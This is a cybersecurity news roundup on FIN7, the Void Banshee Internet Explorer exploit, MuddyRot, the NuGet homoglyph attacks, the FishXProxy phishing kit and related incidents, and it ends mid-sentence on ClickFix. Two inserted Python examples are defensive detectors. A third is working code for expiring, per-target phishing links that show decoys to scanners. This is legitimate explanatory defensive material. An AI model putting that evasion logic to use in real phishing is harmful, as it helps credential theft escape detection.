New research from SentinelOne has uncovered FIN7's recent activities in underground criminal forums, where the group markets its tools and services under various fake aliases. Of these tools, the group has most prominently been selling a highly specialized tool labelled AvNeutralizer (also known as AuKill) that is designed to disable most security solutions. [Image: FIN7 cybercriminal forum activity. Source: sentinelone.com] Advertisements for the AvNeutralizer tool appeared on multiple forums under various usernames, at prices ranging from $4,000 to $15,000. Researchers state that the tool's widespread adoption by various ransomware groups suggests it is no longer exclusive to a single threat actor's operations. Researchers identified several usernames, including "goodsoft," "lefroggy," "killerAV" and "Stupor", that suggested an association with the FIN7 cybercriminal group in promoting its tools and services, such as a post-exploitation framework labelled "PentestSoftware." [Image: FIN7 tool advertisement. Source: sentinelone.com] The group's use of multiple identities across different forums appears to be a strategy to mask its true identity while maintaining its illicit operations.

FIN7 Arsenal Used in Operations

The FIN7 cybercriminal group's success in executing sophisticated cyberattack operations relies on a versatile toolkit that includes:
  • Powertrash: A heavily obfuscated PowerShell script used to reflectively load malware in memory, evading detection.
  • Diceloader: A minimal backdoor allowing attackers to establish command and control channels and load additional modules.
  • SSH-based backdoor: A persistence mechanism using OpenSSH and 7zip to maintain access to compromised systems.
  • Core Impact: A commercial penetration testing tool repurposed for malicious activities.
  • AvNeutralizer: A specialized tool for disabling security solutions.
Analysis of Powertrash samples revealed a timeline of FIN7's malware evolution, showing a transition from Carbanak to Diceloader (also known as Lizar) in early 2021. The group has also incorporated the Core Impact pentesting tool into its arsenal, which correlates with observed underground forum activity where FIN7-associated accounts actively sought cracked copies of the software. FIN7's infrastructure includes command and control servers for Diceloader, which researchers have tracked across various countries and hosting providers. In one instance, an exposed server revealed the group's use of an SSH-based backdoor for stealthy file exfiltration. The group's adoption of commercial tools like Core Impact demonstrates its commitment to using sophisticated, hard-to-detect methods for compromising target networks. The new research sheds light on FIN7's persistent adaptability and ongoing evolution in its operations, which include the adoption of automated attack methods such as targeting publicly facing servers with automated SQL injection attacks. Additionally, the group's development and sale of specialized, independently developed tools such as AvNeutralizer in various criminal underground forums bolster the group's impact and influence among other cybercriminals while demonstrating its technical expertise. FIN7's use of multiple identities and active collaboration with other threat actor groups make it much more challenging for researchers to attribute its operations. The researchers said they hope the research will inspire more efforts to understand and protect against FIN7's continually evolving attack tactics.

Void Banshee Targets Victims Through Use of ‘Zombie’ Internet Explorer Zero-Day

Researchers have uncovered a critical vulnerability (CVE-2024-38112) that the Void Banshee threat actor group has been actively exploiting in a recent campaign to deploy the Atlantida info-stealer through a disabled version of Internet Explorer. The campaign highlights the security risks introduced by the maintenance of legacy software on modern systems.

Anatomy of Void Banshee Attack-Chain

The Void Banshee group lures victims by disguising malicious files as e-books and sharing them through cloud services, Discord servers and online libraries. When a user opens one of these files (typically a zip archive masquerading as a PDF and containing malicious shortcut files), they trigger a chain of events that ultimately installs the Atlantida stealer. [Image: Void Banshee Internet Explorer attack chain. Source: trendmicro.com] Researchers from Trend Micro stated that the attack chain begins with a spearphishing email containing a zip archive with a malicious file disguised as a PDF. The file, named "Books_A0UJKO.pdf.url", uses the MHTML protocol handler and the x-usc! directive to exploit CVE-2024-38112. This allows the attacker to access and execute files through the disabled IE process. The malicious file downloads an HTML file, which in turn downloads an HTA file containing a Visual Basic Script (VBScript) that decrypts and executes a PowerShell script. [Image: Legacy Internet Explorer version on modern systems. Source: trendmicro.com] The PowerShell script downloads an additional script from a compromised web server and executes it in a new process. This script is designed to download and execute a PowerShell trojan, which can be used to compromise the victim's system. The campaign ultimately exploits the vulnerability in the MHTML protocol handler to access and run files through the system's built-in, disabled instance of Internet Explorer. This technique bypasses normal security controls and allows the attackers to directly execute the Atlantida info-stealer on the victim's system.
The researchers note that Atlantida is based on previous open-source stealers such as NecroStealer and PredatorTheStealer and shares many of their capabilities. It targets sensitive information from various applications, including Telegram, Steam, FileZilla, cryptocurrency wallets and web browsers such as Chrome and Microsoft Edge, exfiltrating data such as passwords and cookies. The malware allows attackers to capture victims' screens and exfiltrate information from cryptocurrency-associated browser extensions, registering each extension with a unique 'Extension ID.' Data exfiltrated from the attack is compressed into a ZIP archive and transmitted via TCP.
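The lure shape described above (a zip archive, a decoy ".pdf.url" double extension, and an Internet Shortcut whose URL uses the mhtml: handler) can be checked for at a mail gateway or on an endpoint. The following is an added defensive example, not Trend Micro's code; the sample archive, its contents and the example.invalid URL are constructed, and the list of decoy extensions and suspicious schemes is an assumption.

```python
import configparser
import io
import os
import zipfile

# Shortcut types that Windows will execute even when preceded by a decoy extension.
SHORTCUT_EXTENSIONS = {".url", ".lnk"}
# Decoy document extensions commonly placed before the real one (assumed list).
DECOY_EXTENSIONS = {".pdf", ".doc", ".docx", ".epub"}
# URL schemes that have no business in a "document" download; "mhtml" is the
# handler abused in the campaign above (assumed list apart from mhtml).
SUSPICIOUS_SCHEMES = {"mhtml", "javascript", "vbscript", "file"}


def shortcut_url(data: bytes) -> str:
    """Return the URL= value of an Internet Shortcut (.url) file, or '' if absent."""
    parser = configparser.ConfigParser(interpolation=None)
    try:
        parser.read_string(data.decode("utf-8-sig", errors="replace"))
    except configparser.Error:
        return ""
    return parser.get("InternetShortcut", "URL", fallback="")


def inspect_member(name: str, data: bytes) -> list:
    """Return a list of human-readable findings for one archive member."""
    findings = []
    base, ext = os.path.splitext(name)
    ext = ext.lower()
    if ext not in SHORTCUT_EXTENSIONS:
        return findings
    # "Books_A0UJKO.pdf.url" -> base "Books_A0UJKO.pdf" -> inner extension ".pdf"
    inner_ext = os.path.splitext(base)[1].lower()
    if inner_ext in DECOY_EXTENSIONS:
        findings.append(f"double extension masquerading as {inner_ext}: {name}")
    if ext == ".url":
        url = shortcut_url(data)
        scheme = url.split(":", 1)[0].lower() if ":" in url else ""
        if scheme in SUSPICIOUS_SCHEMES:
            findings.append(f"shortcut uses {scheme!r} scheme: {name}")
    return findings


def inspect_zip(archive_bytes: bytes) -> list:
    """Scan every file in a zip archive and collect findings."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            findings.extend(inspect_member(info.filename, zf.read(info)))
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample: one harmless PDF stub plus a decoy '.pdf.url' shortcut."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("notes.pdf", b"%PDF-1.4\n%constructed placeholder\n")
        zf.writestr(
            "Books_A0UJKO.pdf.url",
            "[InternetShortcut]\r\nURL=mhtml:http://example.invalid/placeholder\r\n",
        )
    return buf.getvalue()


if __name__ == "__main__":
    for finding in inspect_zip(build_sample_zip()):
        print("ALERT:", finding)
```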

Microsoft Patched Vulnerability

The researchers disclosed the vulnerability to Microsoft, which patched the vulnerability in its July 2024 update cycle, unregistering the MHTML handler from Internet Explorer. However, experts warn that many systems may remain unpatched and vulnerable. To protect against this and similar attacks, security professionals recommend:
  • Promptly applying all available Windows security updates
  • Implementing robust email filtering to block malicious attachments
  • Educating users about the dangers of opening suspicious files or links
  • Deploying endpoint protection software capable of detecting and blocking such attacks
As cybercriminals continue to exploit overlooked vulnerabilities in legacy systems, the discovery of CVE-2024-38112 serves as a stark reminder of the importance of comprehensive security measures and timely patching.

Iranian Group MuddyWater Deploys MuddyRot Malware in New Campaign

MuddyWater, a notorious threat actor group linked to the Iranian intelligence service, has been operating a new malware campaign that targeted several Western and Middle Eastern entities. The malware, dubbed "MuddyRot," is a backdoor implant developed in C with a wide range of capabilities and was used primarily to attack various countries in the Middle East, such as Turkey, Azerbaijan, Jordan, Saudi Arabia, and Israel.

MuddyRot Malware

Researchers from Sekoia observed that the new MuddyRot malware is distributed through malicious PDF files and relies on public exploits to compromise internet-exposed servers, such as Exchange or SharePoint servers, moving laterally within the entire network after a successful compromise. After this stage, the threat actors sent spear phishing emails from compromised email accounts to bypass security measures and appear more legitimate to recipients. [Image: MuddyRot MuddyWater malware. Source: blog.sekoia.io] MuddyRot is a sophisticated malware that uses a combination of obfuscation and encryption to evade detection by security tools. Upon execution, the malware de-obfuscates strings, loads the functions it needs, and creates a mutex (a lock that stops a second copy of the program from running at the same time) to establish exclusive control. It also uses dynamic import loading to reduce its potential digital footprint. [Image: MuddyRot execution flow. Source: blog.sekoia.io] The malware establishes persistence on the infected host by creating a scheduled task and copying itself to a system directory. It then communicates with its command and control (C2) server over a raw TCP socket. The MuddyRot malware supports various commands, including file upload and download, reverse shell, and process kill. The reverse shell capability allows the operator to connect to the victim host and execute commands remotely, capturing the results in real time. The malware's C2 communication is obfuscated, using a fixed subtraction value to decode incoming input and adding three bytes to the output. The developer of this backdoor added a "terminate" command to stop the reverse shell.
The MuddyRot backdoor implant is capable of executing the following commands: [Image: table of MuddyRot backdoor commands. Source: blog.sekoia.io] These commands are exchanged with the C2 servers over TCP port 443, with further obfuscation applied to avoid detection.

Shifting Tactics

The MuddyWater group altered its infection strategy from relying on off-the-shelf remote monitoring tools such as Atera and SimpleHelp to the custom-built MuddyRot implant. While the exact reasons for this switch are unknown, the researchers speculate that the change could be due to the increased scrutiny of these tools by security vendors, with the attackers possibly running into difficulties deploying the Atera tool on targets. These difficulties may have prompted the group to switch to something more custom. The researchers note the departure in the MuddyWater group's recent campaigns from its traditional infection chain to the use of well-known exploits and the distribution of spear phishing emails with PDF files embedding links that load the MuddyRot validator. This new tactic allows the malware to evade detection and increases its chances of successful infection. The researchers have shared potential indicators of compromise (IOCs) on GitHub to protect against MuddyRot's deployment. Other cybersecurity firms such as Check Point and ClearSky recently conducted their own investigations into the new malware campaign from the Iranian threat actor.

Philippine Department of Migrant Workers Switches to Manual Systems After Cyber Attack

The Philippine Department of Migrant Workers (DMW) has taken swift action to protect the personal data of overseas Filipino workers (OFWs) after a ransomware attack prompted the agency to shut down its online systems. While the attack may have caused inconvenience, the DMW has activated new protocols to cater to the daily transaction needs of OFWs to ensure that their information remains safe and secure.

Manual Processing at Department of Migrant Workers Offices

In a statement on Tuesday, the DMW said OFW data remains secure despite the cyber incident. The agency took its Management Information Technology System offline as a precautionary measure to protect worker information. To minimize disruption from the attack, the DMW activated manual processing of Overseas Employment Certificates and OFW passes at its national and regional offices, one-stop shops, and Migrant Workers Assistance Centers. The DMW stated, “As a result of a ransomware attack on DMW online systems, the Department through its Management Information Technology System had to take pre-emptive measures to protect OFW data and information, such as taking the systems offline.” OFWs can visit these locations to obtain necessary documents while online systems are unavailable. The DMW has also established an email-based system for OFWs requiring access to information sheets. Rather than physically visiting DMW offices, workers can send requests to infosheet@dmw.gov.ph. The agency will then email QR-coded information sheets directly to the requesting OFW. Alternatively, OFWs can submit requests via Messenger on the DMW's Facebook page. By taking these measures, the DMW said it is ensuring that OFWs can continue to access the services they need while it works to bring its systems back online. The agency is also coordinating with the Bureau of Immigration and airport authorities to facilitate the smooth departure of OFWs. The DMW has apologized for any inconvenience caused by the attack and is working to restore its online systems and implement stronger measures to protect the information of OFWs. In a statement on social media, the DMW said, "Rest assured, DMW databases containing OFW data were not affected by the attack, and that the DMW is currently working with the Department of Information and Communications Technology to restore online systems and ensure continued protection of the data and information of OFWs."

Philippines Cyber Attacks

The Philippines has observed an increased number of cyber attacks in recent times, prompting calls for increased government measures to strengthen the nation's digital infrastructure and reduce such campaigns. A recent bill, House Bill 8199, would have the Department of Information and Communications Technology bolster the Philippine National Cyber Security Plan (NCSP). Rep. Brian Raymund Yamsuan pushed for approval of the new bill in the House of Representatives earlier this year. He stated, “This measure complements the NCSP and is a good jump-off point in accomplishing one of its primary objectives, which is to ensure convergence among all government agencies in protecting our country from cyber attacks.” Yamsuan also voiced support for reports that Philippine President Marcos, U.S. President Joe Biden and Japanese Prime Minister Fumio Kishida had agreed at an earlier trilateral summit to establish a joint cyber defense framework. Several government agencies have also discussed measures to bolster their cybersecurity capabilities, including a unified system for setting minimum security standards, monitoring systems, and detecting and mitigating threats.

Indian Authorities Allege Massive Trafficking Scheme in Chinese Controlled Scam Centers

The Central Bureau of Investigation (CBI) of India has uncovered a large-scale human trafficking operation that has ensnared thousands of Indians in Southeast Asian countries to work in Chinese scam centers. According to a first information report (FIR) filed by the agency, victims are being forced to work as cyber criminals in these operations. Rajesh Kumar, CEO of the Indian Cyber Crime Coordination Centre, revealed that an average of 7,000 cyber-related complaints are registered daily with the National Cybercrime Reporting Portal. Most of these frauds originate in Cambodia, Myanmar and Laos.

Trafficking Scheme of Chinese Scam Centers

According to a recent report from The Indian Express, victims of these campaigns are lured in with promises of lucrative jobs in foreign countries such as Dubai and Bangkok, only to be trafficked to Southeast Asian countries. Once they arrive, they are forced to work in call centers or "casinos" where they are trained to scam people from around the world. One such victim, Saddam Sheikh from Maharashtra's Palghar district, was contacted via WhatsApp about a job opportunity in Thailand. After paying 140,000 rupees (approximately $1,700) for a visa, Sheikh was sent to Bangkok and then to Laos. He was forced to scam people in India, Canada and the United States by promoting fraudulent cryptocurrency investments online. Sheikh eventually managed to escape and return to India. Similar cases have been reported in other parts of Southeast Asia. Martha Praveen, who fled a scam operation in Cambodia, claimed he was among 5,000 Indians working in a call center run by Chinese gangs. Praveen was initially offered a job in Azerbaijan but was instead sent to Cambodia. Upon arrival, his passport was confiscated, and he was taken to a large office complex housing multiple call centers disguised as casinos.

Government Response and Investigation

The CBI filed its case after consulting with the home ministry, telecom ministry and Reserve Bank of India. These institutions were tasked with identifying and addressing vulnerabilities in the banking and telecom sectors that enable such scams. The Telangana Cyber Security Bureau has also filed a similar report based on Praveen's complaint. The victims were reportedly involved in scamming people by offering fraudulent trading, investment and job opportunities, primarily targeting Indians, Europeans and Turkish nationals. As investigations continue, authorities are working to dismantle these criminal networks and prevent further exploitation of Indian citizens. The scale of the operation highlights the need for increased vigilance and cooperation between international law enforcement agencies to combat human trafficking and cyber crime.

Homoglyphs and IL Weaving Used To Evade Detection in Malicious NuGet Campaign

A sophisticated malware campaign targeting the NuGet package manager has been uncovered by researchers. The ongoing attack, which began in August 2023, has evolved to employ advanced techniques like homoglyphs and IL weaving to evade detection and fool developers. NuGet is the Microsoft-supported package manager that allows developers to create, share, and consume .NET (including .NET Core) code. The threat actors have refined their methods over time, moving from simple initialization scripts to more complex approaches: impersonating protected NuGet prefixes and injecting malicious code into legitimate .NET binaries.

Homoglyph Attacks Bypass Security Measures

Researchers from ReversingLabs observed that, in a clever twist, attackers had exploited NuGet's support for homoglyphs to circumvent the platform's prefix reservation system. By using visually identical but technically distinct characters, they created package names that appeared legitimate but were not subject to the usual restrictions. [Image: Malicious NuGet campaign package listing. Source: www.reversinglabs.com] One of the most notable techniques used in this campaign is the use of homoglyphs: distinct characters that look identical but have different code points. The attackers used homoglyphs to create packages that convincingly mimic those using the reserved "Guna" prefix, a security feature of NuGet. For example, the malicious package "Gսոa.UI3.Wіnfօrms" used Armenian and Cyrillic characters to mimic the "Guna" prefix, allowing the attackers to publish packages that looked official but contained malicious code. The campaign's latest phase employs IL weaving, a technique that modifies compiled .NET binaries. Attackers patch legitimate DLL files to include malicious module initializers, which execute when the module is first loaded. This approach makes detection more challenging, as the malicious code is embedded within otherwise legitimate binaries. The injected code typically functions as a downloader, retrieving additional malware from attacker-controlled servers. [Image: Homoglyphs and IL weaving in the NuGet campaign. Source: www.reversinglabs.com] Researchers identified approximately 60 packages and 290 versions involved in this campaign. While the affected packages have been removed from NuGet, the evolving nature of the attack underscores the need for heightened vigilance in the software supply chain.
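A consuming organisation can screen package ids for exactly the homoglyph trick described above. The following is an added example, not ReversingLabs' or NuGet's code: it flags ids whose letters come from more than one Unicode script, and ids that collapse to a reserved prefix once lookalike letters are folded to Latin. The "Guna" prefix and the spoofed id are taken from the page; the lookalike table is a small constructed subset (a production check would use the Unicode confusables data).

```python
import unicodedata

# Reserved prefixes to protect; "Guna" is the one named in the campaign write-up.
RESERVED_PREFIXES = ["Guna"]

# Constructed lookalike table: a handful of non-Latin letters that render like
# Latin ones. Illustrative only; not the full Unicode confusables list.
LOOKALIKES = {
    "\u057d": "u",  # ARMENIAN SMALL LETTER SEH
    "\u0578": "n",  # ARMENIAN SMALL LETTER VO
    "\u0585": "o",  # ARMENIAN SMALL LETTER OH
    "\u0456": "i",  # CYRILLIC SMALL LETTER BYELORUSSIAN-UKRAINIAN I
    "\u0430": "a",  # CYRILLIC SMALL LETTER A
    "\u0435": "e",  # CYRILLIC SMALL LETTER IE
    "\u043e": "o",  # CYRILLIC SMALL LETTER O
    "\u0440": "p",  # CYRILLIC SMALL LETTER ER
    "\u0441": "c",  # CYRILLIC SMALL LETTER ES
}


def scripts_in(name: str) -> set:
    """Return the set of Unicode scripts used by the letters of a package id.

    The script is taken from the first word of the character's Unicode name
    (e.g. 'ARMENIAN SMALL LETTER SEH' -> 'ARMENIAN'); digits and punctuation
    are ignored, so 'UI3' contributes only LATIN.
    """
    scripts = set()
    for ch in name:
        if not ch.isalpha():
            continue
        try:
            scripts.add(unicodedata.name(ch).split()[0])
        except ValueError:  # code point without a name
            scripts.add("UNKNOWN")
    return scripts


def skeleton(name: str) -> str:
    """Fold lookalike letters to Latin and apply NFKC compatibility normalisation."""
    folded = "".join(LOOKALIKES.get(ch, ch) for ch in name)
    return unicodedata.normalize("NFKC", folded)


def check_package_name(name: str, reserved=RESERVED_PREFIXES) -> tuple:
    """Classify a NuGet package id.

    Returns (verdict, detail) where verdict is one of:
      'prefix-spoof' - the first id segment is not a reserved prefix literally,
                       but becomes one after folding lookalike letters
      'mixed-script' - letters from more than one script (homoglyph indicator)
      'ok'           - neither of the above
    """
    first_segment = name.split(".")[0]
    folded_first = skeleton(first_segment).lower()
    for prefix in reserved:
        if first_segment.lower() != prefix.lower() and folded_first == prefix.lower():
            return "prefix-spoof", f"{name!r} folds to reserved prefix {prefix!r}"
    scripts = scripts_in(name)
    if len(scripts) > 1:
        return "mixed-script", f"{name!r} mixes scripts {sorted(scripts)}"
    return "ok", name


if __name__ == "__main__":
    # The spoofed id from the campaign, written with explicit code points so the
    # Armenian (seh, vo, oh) and Cyrillic (i) letters are unambiguous.
    spoofed = "G\u057d\u0578a.UI3.W\u0456nf\u0585rms"
    for pkg in ["Guna.UI2.WinForms", spoofed, "W\u0456nf\u0585rms.Helpers"]:
        print(check_package_name(pkg))
```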

Evolved Tactics

The threat actors behind this campaign have continually refined their tactics, evolving from exploiting NuGet's MSBuild integrations to using simple, obfuscated downloaders inserted into legitimate PE binary files via IL weaving. This technique allows them to add malicious functionality to compiled .NET binaries, making it harder to detect. Detecting these malicious packages is challenging because of the use of homoglyphs and IL weaving. Traditional detection methods, such as YARA, may not be effective in identifying these threats. However, behavioral analysis can help identify suspicious packages and indicators of compromise. This latest campaign highlights the importance of staying ahead of malicious actors and their evolving tactics. The use of homoglyphs and IL weaving demonstrates the creativity and determination of attackers to deceive developers and security teams. It is crucial for development organizations to prioritize software supply chain security and stay informed about emerging threats. Researchers have shared potential Indicators of Compromise (IOCs) for this campaign with NuGet administrators, and the identified packages have been removed from the platform. It is essential for developers to remain vigilant and report any suspicious packages to ensure the security of the software supply chain.

Malvertising Campaign Lures Mac Users with Fake Microsoft Teams Ad

A sophisticated malvertising campaign is targeting Mac users searching for Microsoft Teams, highlighting the growing competition among malware creators in the macOS ecosystem. This latest attack, which uses the Atomic Stealer malware and follows closely on the heels of the Poseidon (OSX.RodStealer) project, indicates growing advancements in threats affecting macOS.

Deceptive Microsoft Teams for macOS Ad Campaign

The malicious ad campaign, which ran for several days, employed advanced filtering techniques to evade detection. Appearing as a top search result for Microsoft Teams, the ad displayed microsoft.com as its URL but actually redirected users through a series of deceptive links. The ad was likely paid for through a compromised Google ad account. Initially, the ad redirected straight to Microsoft's website, but after multiple attempts and tweaks, a full attack chain was finally observed. [Image: Microsoft Teams for macOS malicious ad. Source: malwarebytes.com] Researchers from Malwarebytes stated that upon clicking the ad, users were subjected to a profiling process to ensure only real people proceeded. This could help the malicious site evade detection by automated security tools and scans. A cloaking domain then separated the initial redirect from the malicious landing page, which mimicked the design of the official Microsoft Teams download site. The ad's display URL showed microsoft.com, but it actually led to a fake installation page. The advertiser, located in Hong Kong, runs over a thousand unrelated ads. Upon further investigation, it was discovered that the ad was serving a unique payload to each visitor, generated from a domain called locallyhyped.com. [Image: Fake Microsoft Teams download page. Source: malwarebytes.com] Once the downloaded file was opened, the user was instructed to enter their password and grant access to the file system, allowing the malicious application to steal keychain passwords and important files. The stolen data was then exfiltrated via a single POST request to a remote attacker-controlled web server.

Mitigations for macOS Devices

To avoid falling victim to such attacks, researchers advised caution when downloading applications found via search engines. Malvertising and SEO poisoning attacks can have devastating consequences, and it's crucial to use browser protection tools that can block ads and malicious websites. Additionally, it's recommended to regularly update antivirus software and use a reputable ad blocker to minimize the risk of malware infection. [Image: Atomic Stealer offered for sale. Source: Cyble] This campaign underscores the increasing sophistication of macOS malware, driven by the keen interest threat actors have shown in compromising the operating system's environment. Last year, researchers from Cyble Research and Intelligence Labs (CRIL) observed that the Atomic Stealer used in this campaign had been offered via Telegram at a price of $1,000 USD per month.

Operation BURGAZADA: Russian-Born Couple Charged with Espionage in Australia

Australian authorities have charged a Russian-born couple with espionage in an operation referred to as 'Operation BURGAZADA', which marks the first use of new anti-espionage laws introduced in 2018. Kira Korolev, 40, a private in the Australian Army, and her husband Igor Korolev, 62, a laborer, face allegations of stealing sensitive Defence Force material for Russian intelligence. The couple, who arrived in Australia a decade ago and became citizens in recent years, appeared before a Brisbane magistrate on Friday. They could face up to 15 years in prison if convicted. The case has raised questions about the screening process for military recruits and the ongoing threat of foreign espionage.

Operation BURGAZADA Investigation

The AFP's investigation into the couple's activities is ongoing, with authorities seeking to determine whether the information was handed over to Russian authorities. Australian Security Intelligence Organisation (ASIO) director-general Mike Burgess has warned foreign spies that "when we can support a prosecution, we will support a prosecution." [Image: Press conference in relation to the investigation. Source: spaces.hightail.com] Barrister Dylan Kerr, a commissioner from the Australian Federal Police, filed an application for the suppression of five names related to the case for national security reasons. The Defence Force has responded to these allegations by cancelling the couple's access to defence bases and systems. Court documents reveal that Kira Korolev is accused of providing unlawful access to defence computer systems, copying and disseminating information, and maintaining relationships with Russian Federation intelligence services. The alleged activities date back to December 2022 and continued until their arrest on July 11, 2024. Australian Federal Police Commissioner Reece Kershaw said Kira Korolev, an information systems technician with a security clearance, allegedly traveled to Russia in 2023 while on leave. During this time, she reportedly instructed her husband on accessing defence systems using her work account from their Brisbane home. A caretaker of the apartment block where the couple resided, Blake Fraser, stated that he had not noticed any suspicious activity from the couple. He stated, “I kept my eye out for anything unusual, but honestly, even being here on-site, I never saw anything.” He said his first hint that something was off came when the building received a request from ASIO and the AFP to access its F block; he was later greeted by police cars and officers who arrived to arrest the couple.
“I certainly wouldn’t think that in my lifetime something like this would have happened,” Fraser exclaimed.

Official Response and Implications

The arrests resulted from a joint operation involving the Australian Security Intelligence Organisation (ASIO) and the Australian Federal Police. ASIO Director-General Mike Burgess stated that the Defence Force's security awareness allowed early intervention and control of the operation. Authorities are investigating whether Kira Korolev joined the Defence Force with the intention of committing espionage or whether the couple had been recruited more recently by Russian intelligence. The case has prompted a review of vetting procedures for military personnel, especially those born overseas. While officials claim no significant security compromise has been identified, the incident highlights the ongoing challenges of countering foreign espionage. Burgess encouraged potential Russian spies to defect and share secrets, citing the famous example of the 1954 Petrov defections, in which Soviet spies posing as Russian diplomats defected to Australia. Burgess stated, “If you want to share your secrets, please reach out”. [Image: Vladimir Petrov and Evdokia Petrov, who defected to Australia in 1954. Source: www.naa.gov.au] Federal Police Commissioner Kershaw stated that no other individuals had been identified so far in the investigation, while investigators are also working to assess whether the couple had established any rapport with Russian diplomats based in Australia. Court documents allege the couple maintained a relationship with members or affiliates of Russian intelligence services for the purpose of providing the information. Kershaw expressed confidence in the counter-intelligence capability of the Australian government and the Five Eyes. He stated:
“Our Five Eyes partners and the Australian government can be confident that the robust partnerships within the Counter Foreign Interference Taskforce mean we will continue to identify and disrupt espionage and foreign interference activity.”
Prime Minister Anthony Albanese emphasized that any individuals interfering with Australia's national interests will be held accountable.

New Phishing Kit ‘FishXProxy’ Aims To Be ‘Ultimate Powerful Phishing Kit’

Phishing-Kit-FishXProxy 3

Researchers have discovered a new weapon on the dark web markets: FishXProxy, a sophisticated phishing toolkit that is making waves in the underground hacking community. The package lets even novice attackers build convincing phishing campaigns, potentially putting countless internet users at risk. FishXProxy bills itself as "The Ultimate Powerful Phishing Toolkit," and while its creators claim it is for educational purposes only, its feature set is built for malicious use. The kit provides an end-to-end solution for creating and managing phishing sites, with a focus on evading detection and maximizing the credential-theft success rate.

FishXProxy Phishing Kit

At the heart of the FishXProxy kit is its multi-layered antibot system. These layers are meant to keep automated scanners and security researchers away from the phishing page while letting the intended victims through, so that the phishing nature of sites built with the kit is not detected. [Image: the FishXProxy phishing kit. Source: slashnext.com] The antibot options range from a simple challenge, uniquely generated per-target links and dynamically generated attachments to Cloudflare's Turnstile challenge. Researchers from SlashNext state that the kit's deep integration with Cloudflare gives phishing operators enterprise-grade infrastructure normally associated with legitimate web operations, including Cloudflare Workers, SSL certificates and DNS management, which raises the bar for detection and takedown. [Image: FishXProxy configuration panel. Source: slashnext.com] FishXProxy also implements a cookie-based tracking system that lets attackers identify and follow the same user across different phishing projects or campaigns. This enables more targeted and persistent attacks and the building of detailed profiles of potential victims. Together these tools help attackers manage their campaigns more effectively while making it harder for security teams to analyze and shut down the malicious infrastructure. The kit's key end-to-end features include:
  • Advanced antibot system: This multi-layered system prevents automated scanners, security researchers, and potential victims from detecting the phishing nature of sites created with the kit. The antibot system offers several configuration options, including a Lite Challenge, Cloudflare Turnstile, IP/CAPTCHA Antibot, and Off option.
  • Cloudflare integration: FishXProxy leverages Cloudflare's infrastructure to provide phishing operators with enterprise-grade infrastructure typically associated with legitimate web operations. This includes Cloudflare Workers, Cloudflare Turnstile, SSL Certificates, and DNS Management.
  • Inbuilt redirector: This feature allows attackers to hide the true destination of links, distribute incoming traffic across multiple phishing pages or servers, and implement more complex traffic flows to evade detection.
  • Page expiration settings: This feature allows attackers to automatically restrict access to phishing content after a specified duration, limiting exposure, creating urgency, and aiding campaign management.
  • Cross-project user tracking: This feature allows attackers to identify and track users across different phishing projects or campaigns, enabling them to tailor phishing content based on previous interactions and avoid targeting the same user multiple times.
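To make the evasion mechanics concrete, the following Python model, added here and not taken from the kit or from SlashNext's analysis, shows how per-target links with an expiry behave: the first visitor claims the link, anyone else who fetches the same URL afterwards (a URL scanner, an analyst, a forwarded copy) receives a decoy, and once the link expires even the original target gets the decoy. The page contents, the fingerprinting rule and all names are assumptions for illustration.

```python
import hashlib
import secrets
import time

# Stand-ins for the real pages; constructed for this example.
PHISH_PAGE = "<html>credential-harvesting form</html>"
DECOY_PAGE = "<html>404 Not Found</html>"


class OneShotLinks:
    """Model of per-target, expiring phishing links (illustration only).

    Each issued token is bound to the first visitor's fingerprint and to a
    time window, so later fetches by anyone else return the decoy page.
    """

    def __init__(self, ttl_seconds=3600, clock=time.time):
        self.ttl = ttl_seconds
        self.clock = clock          # injectable so the walkthrough is deterministic
        self.links = {}             # token -> {"target", "issued", "bound_to"}

    def issue(self, target_id):
        """Mint a unique link token for one target."""
        token = secrets.token_urlsafe(16)
        self.links[token] = {"target": target_id,
                             "issued": self.clock(),
                             "bound_to": None}
        return token

    @staticmethod
    def fingerprint(client_ip, user_agent):
        # Assumed fingerprint: source IP plus User-Agent. Real kits may add more.
        return hashlib.sha256(f"{client_ip}|{user_agent}".encode()).hexdigest()

    def serve(self, token, client_ip, user_agent):
        """Return the page a visitor gets for this token."""
        link = self.links.get(token)
        if link is None:
            return DECOY_PAGE                      # unknown or guessed token
        if self.clock() - link["issued"] > self.ttl:
            return DECOY_PAGE                      # expired: nothing left to analyse
        fp = self.fingerprint(client_ip, user_agent)
        if link["bound_to"] is None:
            link["bound_to"] = fp                  # first visitor claims the link
        if link["bound_to"] != fp:
            return DECOY_PAGE                      # scanner, analyst or forwarded copy
        return PHISH_PAGE


def walkthrough():
    """Victim first, then a URL scanner, then the victim again after expiry."""
    now = [1_000_000.0]                            # fake clock, in seconds
    links = OneShotLinks(ttl_seconds=600, clock=lambda: now[0])
    token = links.issue("target-1")
    victim = links.serve(token, "203.0.113.5", "Mozilla/5.0")
    scanner = links.serve(token, "198.51.100.9", "urlscanner/1.0")
    now[0] += 601
    late = links.serve(token, "203.0.113.5", "Mozilla/5.0")
    return victim == PHISH_PAGE, scanner == DECOY_PAGE, late == DECOY_PAGE
```

The defensive consequence is the point: a URL that looked benign when a scanner fetched it ten minutes after the click says nothing about what the user saw. Inspection has to happen at click time with the user's own context, or the link has to be blocked before it is clicked.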

Impact of Phishing Kits on Cyber Ecosystem

The rise of FishXProxy and other phishing toolkits has significant implications for cybersecurity. These toolkits lower the technical barrier to running phishing campaigns, letting less-skilled individuals conduct advanced operations, which is likely to increase both the volume and the sophistication of phishing attacks in the wild. Such kits typically ship the following functionality, which would be harder to develop from scratch:
  • Automated installation and setup
  • Built-in traffic encryption
  • Free and automated SSL certificate provisioning
  • Unlimited subdomain and random domain generation
  • Browser security bypass techniques
  • Real-time monitoring and notifications via Telegram
  • Comprehensive traffic analysis tools
FishXProxy additionally offers 'lifetime updates + support', treating the toolkit as a long-term service rather than a one-off sale. To combat these threats, companies should invest in multi-layered security solutions that offer real-time threat detection across email, web and mobile channels. Organizations should also prioritize employee education on the latest phishing tactics and implement strong authentication measures to protect against credential theft.

ClickFix Malware Delivery Method Used in Social Engineering Campaigns

Clickfix Malware Delivery Lumma Stealer and DarkGate

Researchers have uncovered a malware delivery method dubbed "ClickFix," which abuses user trust in compromised websites to deliver the DarkGate and Lumma Stealer malware families. The technique uses social engineering to trick users into executing malicious scripts themselves, potentially leading to full compromise of the affected system. The compromised sites redirect visitors to domains hosting fake popup windows that instruct the user to paste a script into a PowerShell terminal.

